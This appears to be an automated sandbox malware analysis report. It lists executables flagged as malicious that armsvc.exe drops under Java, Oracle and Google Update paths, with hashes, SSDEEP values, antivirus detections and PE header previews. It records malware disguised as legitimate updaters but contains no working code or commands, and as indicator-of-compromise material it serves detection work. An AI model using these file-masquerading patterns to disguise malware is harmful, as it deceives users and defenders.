File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1445888
Entropy (8bit):	4.810167971380732
Encrypted:	false
SSDEEP:	24576:7xGBcmld/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1Gy+dLNiXicJFFRGNzj3
MD5:	D3F3792BEF47A45D62FE2257E6F0CC3A
SHA1:	36777C7D204C6D9A820CB65F8E476DBAD4851447
SHA-256:	89F436EA5AA39EB881804C1858473693AB66ADD188D2AA4E2FDAB159881E7EAC
SHA-512:	490B9FC0408455A484B7930BA25EA23E7432668A863CC71E7C4A8AAFA366D4D3E14F7A651029565B53149F5933D81DC2B91DA030784450989920B91B897E1AB7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@...........................!......7......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...p...........`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1800192
Entropy (8bit):	5.302172272555283
Encrypted:	false
SSDEEP:	24576:g0vHyTLj8trn3ws1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:hWj4rgs1LNiXicJFFRGNzj3
MD5:	5DD0422D98C097A332026D7A0551D9A3
SHA1:	1ACA517D676D8473BDFAEE34F0A216010C46F982
SHA-256:	6F364BACEAB7B286F73CAF783145AF6A46CEBB2E47994B9CF1411E161AA463E2
SHA-512:	17D4FE9A3DB13D3DFD142B8E0D8E27C325BC131391815E8E68AF34CA0D7080E50B27A4CAC1F231968C7E02270BFDA899E98846037087706273D126B1422BAC61
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................p&.....nL......................................<........P...\|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....\|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1781760
Entropy (8bit):	7.271324441937776
Encrypted:	false
SSDEEP:	49152:m4ijwGJra0uAUfkVy7/ZYLNiXicJFFRGNzj3:mNjwGJrakUQyy7wRGpj3
MD5:	4899DC98230F7BFB5E023F8C7797F40F
SHA1:	F7DE5FAF25348F774410D49C94F7C7F74E156B55
SHA-256:	7B28642AED6A6241E405A474791FE81D1AA0A74644A79713C16E9D69C8653F77
SHA-512:	6A18C5568898409AA28E525BDB0ADF0AEB9DE5EDD8672CC6F353CDFDF76F08B3FA6A43B78EB8708B7EEA89D84ADAC37EA17D70935B813915402A30D9F8F58C35
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................#...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318400
Entropy (8bit):	7.438349308787549
Encrypted:	false
SSDEEP:	24576:veR0gB6axoCxyR6RLQRF/TzJqe58BimP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:pgHxWR6uBTzge5MimPLNiXicJFFRGNzb
MD5:	918E8BC02076C23101A091AADC35929F
SHA1:	FF69482DBC6F922ED7464E02527A2A8FB2F29C31
SHA-256:	2C3803FF7AC28EDF293BBDEB0F8C92CC564A9B84511A8C75BCD22EC44401A52F
SHA-512:	A58D1AADD8B1B1A757007E79A15153F0E78BC4D505B8CF285CF9BD87E2574F05F2187076A12C4735D52D94A750A2657AE72C9B04572D9C44C53E4060A47DF9F7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1530880
Entropy (8bit):	4.9948957149699735
Encrypted:	false
SSDEEP:	24576:KpwOtO7F/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KmOtmFLNiXicJFFRGNzj3
MD5:	B946667D713973BFE36F500553B13061
SHA1:	39466AE351650BFE9BC715B35DE61B715536145E
SHA-256:	071F30BE8DBDD24DBFB064EE4FB3CF04E00A39C27FB46F9FD5CFBF02075B68E7
SHA-512:	2028D48E954ACEB470120AFC4F0DC9A2799721B484C8560F64BE8F99B87D2941E34054689AFD516604F5087D324CA62A330BAF2885B9ABF8065AF3C67F608C05
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P".....t........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1530880
Entropy (8bit):	4.9955862202717505
Encrypted:	false
SSDEEP:	24576:3KU/h/4Ku/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3r/VuLNiXicJFFRGNzj3
MD5:	F5531EAE99DB0009D16A46F639E479DC
SHA1:	BC6C30F224E7770D09E0156FC29620B18E198FE6
SHA-256:	15FDFD59608B7896B9D653EED4BD1878209CD603B8BB0A775169E7A25026EDED
SHA-512:	162CBE61E6C9DFB30B71305BE4854180558F0379C325F099153F84F2B91B6428B07D7340AAD2C4755BDBE512994180600E9047C97C0E020209514731B9C09884
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P".....`........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1669632
Entropy (8bit):	5.069200028958859
Encrypted:	false
SSDEEP:	24576:ex7YiBLZ05jNTmJWEx5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:exUiHIjNg5LNiXicJFFRGNzj3
MD5:	3494B19A0051B50D4E8E2A230D835402
SHA1:	520ECEAF1788F0D77999294878E8E635A0F7C12B
SHA-256:	C05155F41DF072E5F9D92F686CB8002A8D18298AD4EF9A7147BCED8557632322
SHA-512:	FB2FE9A809E8B3295834872232C4F9A74D0E7C060031C23E154892DAE238580CFF76C304F501E0F4037BE479B2CB4CBED24F2A499964E5092D7F9D26D8A41BC8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1574912
Entropy (8bit):	5.027357435262426
Encrypted:	false
SSDEEP:	24576:LlnRkld6fgJcEwixn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XokfgJcEwCnLNiXicJFFRGNzj3
MD5:	A838F172951A5722AB70F4BE42E3EE7F
SHA1:	278E7F888423DE6DD8A75BB2C5952E0F3944B08D
SHA-256:	CC9D4D42A554BF630CBE109FD9C80ABFACDCAC36E4EAB45A268940294F64BBEF
SHA-512:	520A6E7DC3856C3396C11307FDAAA6123439B437231685A260846141360733DDB354B3794D35DCB27298CCED1B03119FFB07EF747D601A0D4D493CDAC3CDC919
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................#.............................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1677824
Entropy (8bit):	5.084994578837423
Encrypted:	false
SSDEEP:	24576:lWR5k8hb0Haw+xX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:lWLk8SHawmXLNiXicJFFRGNzj3
MD5:	2CC0CEAD153E5A67F473B08ABE12EF96
SHA1:	10CD9A4650CD0770FEE5A49DFDB634DAD3619657
SHA-256:	243BEE98935368D458D781D7F46E6B7698E4473609A0C47ABE2BC893B208A1CC
SHA-512:	61BBC4A61ABDE4C6804183A559155B9D800D9D1DCBD8F5AE63386E92B0B8770521577A8E70D7B93651D6ED9138420EF344F072F57DBAAB5B368E5051E44CE09B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@..............................$.....TZ.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...p...`......................@...........................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1437696
Entropy (8bit):	4.700951533483725
Encrypted:	false
SSDEEP:	24576:TkCKABf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TxKkfLNiXicJFFRGNzj3
MD5:	6BF4EDCE96FF33C274C7A6390FC4B6B5
SHA1:	C91074B9606F6876205A2F032DA293B4C8DCB235
SHA-256:	CA8747019B88E047ABE2FDDCFE4E2EF02FD389272662648899DA05479AB074F0
SHA-512:	2A0AEEE49EA0722576AEF877C8C9F87AA09CA5E139113C74DBDBE10852D5B0CCEB56C1CB1D5103591190D85D15FF43172BA337CE2BBC158DB9CFF1830D613A25
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U..Q..U..V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@........................... .....k@......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...p...........@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1383936
Entropy (8bit):	4.680871651800752
Encrypted:	false
SSDEEP:	24576:kjNWBPk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WNmsLNiXicJFFRGNzj3
MD5:	345B4C71F0D6011D5A54E6B45BF5DF4A
SHA1:	A1A231FE42D7C795870AB8194D3E51812CB6E77C
SHA-256:	EF4257C6D2B19C0D5715E2886E538C882289A2CBD700D755E5347039C9E5568B
SHA-512:	498F6F4B8EDA8682E5B217CA4612EA85C9291DA5BF567A719A604EA17A6CF953AC3AFA0F2969F4B4E440FB019F0B05CEE5C852E356FB7FF5F702E08FC44DB82C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@........................... ..............................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1458176
Entropy (8bit):	4.778606345089238
Encrypted:	false
SSDEEP:	24576:OijRyhdsRra/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OijsoRaLNiXicJFFRGNzj3
MD5:	65FDB0230B24F375B489BB85DBB4E13C
SHA1:	B64C6B8F1CBE18214845AAC51DD3358EBACC2C36
SHA-256:	2D3BA72C62F8631DDFA55465B783A2ACB4864E7CB094C08EEBA81D4BF06608E4
SHA-512:	E09FACC7B31FD5E55A50BE3FFE9F9CE4496840DC4B33544D6D53DC5BF1D3D8EEDAC3596B4C7715F7E9C1BECF8D87D66E8F5D23782BC50D8C9CDDCEDDE4B7BAF6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~...X..~..X...2..X...2..X...2...X...3..X..~..X..~..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@..............................!........... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...`... ......................@...........................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1498112
Entropy (8bit):	4.895430194113113
Encrypted:	false
SSDEEP:	24576:Q16DmRF+wpx/Qaf9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XmRF+wn/Jf9LNiXicJFFRGNzj3
MD5:	FADE6B68896BD34F41E6F5E7AD97F1BD
SHA1:	1484B522DA1E75A9F1464B3BD54C48160C1219B4
SHA-256:	8A940423211BD3363967EB374DAE64E14E4C4B2C7CE2F160F4F49AF5A54F8D7A
SHA-512:	C60B4D564B7D2B8611A8F0FB054B6CE52E498F207508D531BD04F41E3CA3C34E75DCADE647929B74846C24474315C9CBB9D14AE392ABAC6CEA375C79FAA89176
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@...........................!.....7................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1383936
Entropy (8bit):	4.680838516458411
Encrypted:	false
SSDEEP:	24576:6E21BPb/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:b2bTLNiXicJFFRGNzj3
MD5:	78754B2A07E445790B030905C7D7BE4E
SHA1:	671B830F04B7EA3C5FA4F5AAC9D48F7D6FE8B705
SHA-256:	1F39D18D7B6EA48E26560F6D4DF28CF78C29C703EF788810EE3E8A8B03948CA8
SHA-512:	B0BE8E8A8F3FB28BC0F09F5F9A83A9737EA741114303A9F7A50F2B08DF9419452F993B5DE9BC167CAC3B0A3AD0A86323211D3C16E59285F78349C6AB961A2BB2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... ......E.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2151936
Entropy (8bit):	7.985856386090312
Encrypted:	false
SSDEEP:	49152:nskVX3lfrFfR0BecCqKBs+4o8YhAILNiXicJFFRGNzj3:nPR1frZRpcTKX4u7wRGpj3
MD5:	D1DCC8FDEA2D82FEB766AB63BD2F0C6C
SHA1:	C2DF7982E08C2C6B75F646DC9D676BDC257C1378
SHA-256:	FDE708B88291E45A822FF72D70A1316DA1269A920E75AB88B15377042C2E06CC
SHA-512:	CE5F42AC5DE8B00D2AA89347592708F8E53280FAAEA8801CBA6FF4F27846C9413197EE42636D5147B888F09A5C17A5F1D09AF2AC4C4493A90D0494785921DE1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4.....................@.............................@!.....p.!... ..................................................X..P...............\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2151936
Entropy (8bit):	7.985857412976341
Encrypted:	false
SSDEEP:	49152:dskVX3lfrFfR0BecCqKBs+4o8YhAILNiXicJFFRGNzj3:dPR1frZRpcTKX4u7wRGpj3
MD5:	52599CA8420EC18BBE6CF608FB82AD5A
SHA1:	742477A04118B655BE76DB107C4673679F73F855
SHA-256:	DE40FCE3D7B9780EEAE1DFF87B2041468E4CAD01A8A672B2B7B78986A0AAB412
SHA-512:	885D8B33B63B80FB40BC4FC1ACD95EDEF1E63E72FBF770BF9B1EA534326F9AA4DA34735399D5B5889586FF3CFCAC78F58CFBCA433844C0BD35CE2A89CC6989C5
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4.....................@.............................@!.....2.!... ..................................................X..P...............\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1313792
Entropy (8bit):	4.567740341896231
Encrypted:	false
SSDEEP:	12288:s7iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:sv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	A93BE3F54C0348E38735CA2E9D8D2FAB
SHA1:	9A4FCA1D69C480517E3AFE7723D9A8FF6479C574
SHA-256:	83E24391C6D1F97308DA092BC7BFFB418A1CD4EBF6CB02A3B6496EE5F2282DA2
SHA-512:	ECA0BA206623AF0B36DBAD3A337DA2190E4FF8E38F67BF79F97A07B1F1FEF0EB66C936EC0A3360A79EDF18466EE891D09EFEE28474D036092BC51D44762E88AF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................+.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.528852864442682
Encrypted:	false
SSDEEP:	12288:d2SiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:M0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	AD12C793C31BE25E00C4F2627411514D
SHA1:	B32BB855D835080FA200CBBD54E144F07E058BC0
SHA-256:	1A737EB316EA96AD82BD7F71AF7C2E46A5210243DC4545868546B5EF7D558F23
SHA-512:	13E41754495B4E317A8F4CFC8B07BE0CD6946CCF08CB03933025866511A3D6D43FBC2CFADB197D62D0E48E94BB0FBB6F64658EBB131F82E5CCCED3DAC9D2BF2A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1530880
Entropy (8bit):	4.994901456576699
Encrypted:	false
SSDEEP:	24576:zpwOtO7F/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zmOtmFLNiXicJFFRGNzj3
MD5:	CA0559ABE54063B32B3BCE98B6484502
SHA1:	8475E81EFC9E9A0B2F9B4BF7F824F3FDA1301EAD
SHA-256:	D67FE318AEF8E2E67D1397FACEA500A47FC14DF6FBDE26170E47D43872C2B9A3
SHA-512:	14F744FE032BA7481FF766963A20D9C2A46C849F10AEE78FFE69D9811B1CCA20BBE42D8C0B76B9F3C5FE47FFD874DA79D2417225B256FFE909A92E8F4FF496F2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1368064
Entropy (8bit):	4.635823624434591
Encrypted:	false
SSDEEP:	24576:c1Q/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cSLNiXicJFFRGNzj3
MD5:	F6B577D487096FBB66E236207E454028
SHA1:	EBF5E117FB9777FA236BEF85B0351322DCECB425
SHA-256:	AF0DF82CACA58D92D6AE62E8CBBD637362C119ACB30DEB7147781C98B728B1B0
SHA-512:	9517C987B596A59BC54CC41C9846C76D1A0223CD6FB3C3950E18506F025F78C029F3DC0B23FB0A90F864868BB7FE5514B4F2F8E14EC4737760DE9F32E6211015
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................{......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................

